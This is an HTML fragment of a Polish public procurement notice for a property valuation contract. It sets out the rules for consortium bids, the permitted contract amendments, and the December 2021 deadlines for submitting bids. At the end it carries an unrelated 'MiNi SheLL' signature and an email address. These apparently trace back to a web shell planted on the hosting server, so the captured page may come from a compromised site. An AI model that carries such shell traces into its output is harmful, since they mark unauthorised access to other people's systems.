zamówienie – pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty, przez dwa lub więcej podmiotów), pod warunkiem, że taka oferta będzie spełniać następujące wymagania:<br/>1) Wykonawcy wspólnie ubiegający się o zamówienie, zgodnie z art. 58 ust 2 ustawy Pzp muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę;<br/>2) Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę; UWAGA:<br/>pełnomocnictwo, o którym mowa powyżej (pkt 1 i 2) może wynikać albo z dokumentu pod taką<br/>samą nazwą, albo z umowy podmiotów wspólnie składających ofertę;<br/>3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika);<br/>4) Wszelka korespondencja dokonywana będzie wyłącznie z Wykonawcą występującym jako<br/>Pełnomocnik pozostałych;<br/>5) Wskazanie lidera w druku oferty (w przypadku oferty złożonej przez konsorcjum); 10.2. W<br/>przypadku gdy oferta wspólna Wykonawcy zostanie najwyżej oceniona, Wykonawca<br/>przed udzieleniem zamówienia, składa na wezwanie Zamawiającego dokumenty o których<br/>mowa w rozdziale IX ust. 9.4. SWZ, przy czym dokumenty wymienione w rozdziale IX ust. 9.4.<br/>pkt 1) SWZ składa odrębnie każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>10.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z<br/>nich nie może podlegać wykluczeniu z postępowania na podst. art. 108 ust. 1 oraz art. 109. ust.<br/>1 pkt 4, 5 i 7 ustawy Pzp.<br/>10.4. Nie dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym również<br/>jest złożenie przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>10.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>10.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W tym przypadku Wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4<br/>ustawy Pzp, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 6 do SWZ (forma złożenia<br/>oświadczenia została opisana w ust. 16.5. i 16.6. SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.1. Zamawiający przewiduje możliwość wprowadzenia zmiany postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>21.2. Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, w<br/>przypadku wystąpienia co najmniej jednej z następujących okoliczności:<br/>1) nastąpi zmiana przeznaczenia nieruchomości w związku ze zmianą miejscowego planu<br/>zagospodarowania lub studium uwarunkowań i kierunków zagospodarowania;<br/>2) zmiana zakresu przedmiotu zamówienia z uwagi na przekazanie lub konieczność przekazania<br/>nieruchomości lub jej części na rzecz instytucji samorządowych lub innych;<br/>3) zmiana numerów działek składających się na wycenianą nieruchomość;<br/>4) geodezyjna zmiana powierzchni wycenianej nieruchomości;<br/>5) zwiększenie powierzchni wycenianej nieruchomości, nie więcej niż o 10%;<br/>6) zmniejszenie powierzchni wycenianej nieruchomości;<br/>7) w przypadku ujawnienia środków trwałych nieujętych w ewidencji KOWR;<br/>8) wykonanie przedmiotu umowy stanie się zbędne dla Zamawiającego ze względu na jego<br/>właściwość lub przeznaczenie albo gdy jego realizacja przez Wykonawcę będzie niemożliwa do<br/>wykonania z przyczyn nie dających się przewidzieć w chwili zawarcia umowy. W takim<br/>przypadku, Wykonawcy przysługuje zwrot jedynie faktycznie poniesionych kosztów realizacji.<br/>21.3. Dopuszcza się zmianę umownego terminu realizacji, w przypadku wystąpienia co najmniej<br/>jednej z następujących okoliczności:<br/>1) w przypadku opóźnienia w przekazaniu przez Zamawiającego przewidzianego w umowie<br/>kompletu dokumentów dla Wykonawcy - wydłużenie umowy nastąpi jedynie o czas<br/>spowodowany opóźnieniem;<br/>2) zmiany spowodowane działaniem osób trzecich, w wyniku których wykonanie przedmiotu<br/>umowy będzie niemożliwe bądź utrudnione, a działania te nie są konsekwencją winy<br/>którejkolwiek ze Stron - wydłużenie umowy nastąpi jedynie o czas spowodowany opóźnieniem;<br/>3) wystąpienia warunków siły wyższej – przez którą należy rozumieć wystąpienie zdarzeń<br/>i okoliczności, na które Strony nie mają wpływu i przed którymi nie mogły się zabezpieczyć, w<br/>tym w szczególności udokumentowane warunki atmosferyczne uniemożliwiające<br/>przeprowadzenie rzetelnej lustracji wycenianej nieruchomości, epidemie i inne klęski - które<br/>uniemożliwiły wykonanie Umowy w dotychczas ustalonym terminie;<br/>4) zmiany będące następstwem działania organów administracji, a w szczególności:<br/>a) przekroczenie określonych przez prawo terminów wydawania przez osoby trzecie wypisów,<br/>wyrysów, opinii, decyzji, zaświadczeń itp. skutkujące niemożnością wykonania zamówienia, a<br/>opóźnienie organów nie wynika z przyczyn leżących po stronie Wykonawcy,<br/>b) przystąpienie przez gminę do opracowania nowego planu zagospodarowania przestrzennego<br/>lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.<br/>21.4. Dopuszcza się zmianę osób odpowiedzialnych za wykonanie zamówienia z<br/>zastrzeżeniem, że wprowadzona zmiana nie może skutkować zmianą Wykonawcy zamówienia:<br/>1) zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne<br/>legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w SWZ,<br/>2) zmiany kluczowego personelu Wykonawcy na skutek zdarzeń losowych, zmian<br/>kadrowopersonalnych,<br/>utraty wymaganych uprawnień, utraty stanowiska. Zmiana kluczowego personelu<br/>Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej<br/>równoważnych.<br/>21.5. Zmiany, o których mowa powyżej, nie będą stanowić podstawy zwiększenia wynagrodzenia.<br/>21.11. Zmiany umowy dotyczące Zamawiającego lub Wykonawcy, tj. nazwy podmiotu, adresu,<br/>NIP, REGON lub osób wyznaczonych do kontaktów lub numerów telefonów kontaktowych, nie<br/>wymagają aneksu do umowy lecz Strony są zobowiązane do natychmiastowego wzajemnego<br/>powiadomienia<br/>o tym fakcie drugiej strony w formie pisemnej. Wobec braku zawiadomienia drugiej strony o<br/>zmianie danych adresowych, o których mowa wyżej, doręczenie uznaje się za skuteczne na<br/>adres podany<br/>w niniejszej umowie <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-02 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-02 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia, oprócz ceny brutto, stanowi kryterium wyboru oferty.<br/>Wykonawca w druku oferty (zał. nr 1 do SWZ) deklaruje termin wykonania zamówienia, który nie może być krótszy niż 14 dni i nie może być dłuższy niż 21 dni. W przypadku gdy Wykonawca wpisze termin krótszy niż 14 dni bądź dłuższy niż 21 dni, Zamawiający odrzuci ofertę jako niezgodną z warunkami zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com